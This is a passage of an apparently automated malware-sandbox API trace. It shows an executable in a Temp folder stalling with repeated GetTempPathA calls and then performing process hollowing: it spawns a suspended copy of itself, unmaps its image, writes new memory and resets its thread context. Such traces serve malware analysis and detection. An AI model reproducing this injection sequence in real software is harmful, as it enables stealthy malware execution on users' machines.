nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.889] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.890] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.193] VirtualProtect (in: lpAddress=0x1b34e0, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0096.195] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0096.195] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0096.195] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0096.195] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0096.196] GetProcAddress 
(hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0096.196] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0096.197] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0096.197] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0096.197] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0096.197] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0096.197] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0096.197] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0096.197] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0096.197] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0096.197] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0096.197] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0096.197] CreateWindowExA (dwExStyle=0x200, 
lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x700ce [0096.304] PostMessageA (hWnd=0x700ce, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0096.304] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0096.304] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0096.304] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x150000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0096.304] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.304] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, 
hThread=0x48, dwProcessId=0xb74, dwThreadId=0xb78)) returned 1 [0096.307] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.307] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0096.307] GetThreadContext (in: hThread=0x48, lpContext=0x150000 | out: lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, 
[34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, 
[221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, 
[402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0096.530] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0096.531] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0096.531] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0096.531] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x1b4780*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b4780*, lpNumberOfBytesWritten=0x0) returned 1 [0096.531] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x1b4b80, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: 
lpNumberOfBytesWritten=0x0) returned 0 [0096.531] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x1b4b80*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b4b80*, lpNumberOfBytesWritten=0x0) returned 1 [0096.538] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x209180*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x209180*, lpNumberOfBytesWritten=0x0) returned 1 [0096.538] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x1b48b4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1b48b4*, lpNumberOfBytesWritten=0x0) returned 1 [0096.539] SetThreadContext (hThread=0x48, lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, 
